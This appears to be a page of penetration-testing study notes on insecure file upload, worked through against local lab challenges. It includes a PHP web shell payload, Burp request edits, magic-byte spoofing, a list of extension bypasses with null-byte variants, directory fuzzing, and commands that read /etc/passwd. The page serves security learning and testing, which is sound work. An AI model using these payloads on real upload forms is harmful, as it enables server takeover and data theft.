Web App - Insecure File Upload

PayloadsAllTheThings - Upload Insecure Files
Insecure file upload | AppSecExplained

➡️ Insecure file upload occurs when an application improperly handles user-uploaded files, allowing attackers to upload malicious files, such as scripts or executables, which can lead to remote code execution, data breaches or server compromise.

Insecure file upload - Basic bypass

Run BurpSuite and open the http://localhost/labs/f0x01.php challenge
Upload a png file and check the request in BurpSuite. Send it to the Repeater
- there is a script checking for valid extensions only client side

<script>
function validateFileInput(input) {
    var validExtensions = ['jpg', 'png'];
    var fileName = input.files[0].name;
    var fileNameExt = fileName.substr(fileName.lastIndexOf('.') + 1);
    if (!validExtensions.includes(fileNameExt.toLowerCase())) {
        input.value = '';
        alert("Only '.jpg' and '.png' files are allowed.");
    }
}
</script>

# In the repear Request, remove the PNG content and change the filename to .txt
Content-Disposition: form-data; name="uploaded_file"; filename="logo-tcm.txt"
Content-Type: image/png
hello world

# Send the request
# Response
The file logo-tcm.txt has been uploaded.

# e.g. for command execution

# filename="cmd.php"

<?php system($_GET['cmd']); ?>

To find cmd.php on the webserver, run ffuf to find the directories of the web server

ffuf -u http://localhost/FUZZ -w /usr/share/wordlists/dirb/common.txt

assets		[Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 0ms]
includes	[Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 0ms]
index.php	[Status: 200, Size: 27945, Words: 13300, Lines: 506, Duration: 11ms]
labs		[Status: 301, Size: 305, Words: 20, Lines: 10, Duration:
uploads		[Status: 301, Size: 308, Words: 20, Lines: 10, Duration: 0ms]

ffuf -u http://localhost/labs/FUZZ -w /usr/share/wordlists/dirb/common.txt

uploads		[Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 0ms]

Open http://localhost/labs/uploads/cmd.php?cmd=whoami in the browser and check the command response
Another one view-source:http://localhost/labs/uploads/cmd.php?cmd=cat%20/etc/passwd

Insecure file upload - Magic bytes

Same as before, upload a png file and send the request to the BurpSuite repeater
Clean the content and set the cmd shell

# filename="logo3.php"

<?php system($_GET['cmd']); ?>

# Response:
# Only '.jpg' and '.png' files are allowed.Sorry, your file was not uploaded.

The extension checks are happening server side
Check the magic bytes of the file. Sometimes applications identify file types based on their signature bytes. Replacing them in a file can trick the app.

# e.g.
PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[
JPG: \xff\xd8\xff
GIF: GIF87a OR GIF8;

file logo3.png
	logo.png: PNG image data, 1080 x 1080, 8-bit/color RGBA, non-interlaced
head logo3.png
# Check the first line - magic bytes

Insert <?php system($_GET['cmd']); ?> in the PNG content - Success, file uploaded
Open http://localhost/labs/uploads/logo3.php?cmd=whoami
- if it does not work, modify the content by keeping only the magic byte and the php payload

Command executed correctly at http://localhost/labs/uploads/cmd2.php?cmd=whoami

Extensions e.g.

.jpeg.php
.jpg.php
.png.php
.php
.php3
.php4
.php5
.php7
.php8
.pht
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.gif
.php\x00.gif
.php%00.png
.php\x00.png
.php%00.jpg
.php\x00.jpg

Insecure file upload - Challenge

Upload logo.png and send request to BurpSuite repeater
Modify the request as above and send it

# The file extension '.php' is not allowed.Sorry, your file was not uploaded.

Checklist
Understand the file upload functionality
Are there file type restrictions?
Are there file size restrictions?
Are files renamed after upload?
Are files checked for content type matching the extension?
Test for bypassing file extension filters
Upload a file with a double extension (e.g., .jpg.php)
Upload a file with a null byte injection (e.g., .php%00.jpg)
Test for malicious content within a file
Upload a file with a simple XSS payload in its content
Test for inadequate file storage handling
Are uploaded files accessible from the internet? (Path/URL guessing)
Can other users access the uploaded files?

Try with php5 extension - Success

Browse to http://localhost/labs/uploads/logo.php5?cmd=whoami - error
Try with phtml extension
- http://localhost/labs/uploads/logo.phtml?cmd=whoami - Success

PreviousWeb App - Command Injection NextWeb App - Authentication Attacks

Last updated 9 months ago

Was this helpful?